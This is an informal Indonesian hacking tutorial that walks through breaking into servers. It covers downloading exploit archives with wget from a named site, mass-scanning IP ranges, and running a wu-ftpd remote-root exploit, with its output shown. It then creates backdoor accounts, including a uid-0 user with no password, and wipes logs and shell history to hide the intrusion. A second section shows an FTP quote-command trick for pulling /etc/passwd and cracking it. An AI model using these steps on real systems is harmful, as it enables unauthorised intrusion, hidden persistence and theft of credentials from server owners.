Hacking Server Dari shell : Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell. Pertama-tama perlu di siapkan : 1. Shell account yang masih idup. 2. Satu bungkus rokok sampoerna kalo lagi berduit, kalo lagi bokek rokok pusaka apa boleh buat hiahaiahi. 3. Satu gelas kopi susu panas. Udah siap semua nyah??? lets...Try For Hack... Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita cari dulu exploits buat kita hack itu server orang, untuk session ini saya menggunakan exploits ftp.tgz dan xpost.tar.gz.. kita download doloe exploits itu. terserah dari site mana yang menyediakan exploits ftp.tgz. contoh www.utay-doyan.cc/ftp.tgz / www.utay-doyan.cc/xpost.tgz. Jadi di shell kita tinggal ketik wget www.utay-doyan.cc/ftp.tgz . Setelah file udah selesai di download ketik tar -zxvf ftp.tgz . Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost. Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini : [iwek@jarada xwurm]$ ./scan 211.240Wait for Scanning 211.240 (3-5 minutes for class B)Scan Result:--------------------------------211.240.28.66211.240.38.1211.240.48.62211.240.48.190211.240.56.62211.240.56.254211.240.56.126211.240.61.30211.240.61.62211.240.61.126211.240.61.158211.240.61.238--------------------------------Results logged in wu-scan.log[iwek@jarada xwurm]$ nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server. Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini : [iwek@jarada ftp]$ ./awu 211.240.56.254Checking 211.218.149.47 for vulnerable wu-ftpd 2.x < 2.6.2: Ok7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)team teso (thx bnuts, tomas, synnergy.net !).Compiled for MnM 01/12/2001..pr0t! # trying to log into 211.240.56.254 with (ftp/mozilla@) ... connected.# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.# successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps# 2. sending bigbuf + fakechunkbuilding chunk: ([0x0807314c] = 0x08085f98) in 238 bytes# 3. triggering free(globlist[1])## exploitation succeeded. sending real shellcode# sending setreuid/chroot/execve shellcode# spawning shell############################################################################uid=0(root) gid=0(root) groups=50(ftp)Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root. Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita nahh apabila ada keterangan : Changing password for user ganjenpasswd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 -d / abis itu ketik lagi passwd -d crit abis ketik itu kita otomatis udah dapet acces root nahh semuanya udah selesai khan... jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh... abis semuanya kelar kita udah add user udah dapet acces root nttar ketik : cd /rm -f /.bash_history /root/.bash_history /var/log/messagesln -s /dev/null /root/.bash_historytouch /var/log/messageschmod 600 /var/log/messagesrm -rf /var/log/lastlogcat > /var/log/lastlog udah di ketik semua ? udahh... tekan ctrl d . udah deh ... keluar khan... crottt... hiahaihaia mudah khan :) nice to try. Buat exploits lain kamu bisa cari di site-site laen... Hacking Shell Melalui Ftp : Hacking shell melalui FTPBerikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :1.jalankan prompt2.Tuliskan command untuk membuka dos command prompt3.tuliskan ftp server.to.hack.com (nama servernya!!)4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)5.Akan muncul password login.. tekan saja enter...6.sekarang ketiklah "quote user ftp" dan tekan enter7.lalu ketik "quote cwd ~root" tekan enter8.dan ketikan "quote pass ftp" tekan enterSekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:\passwd dengan menggunakan notepadJika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya.... --------------------------------THE END---------------------------------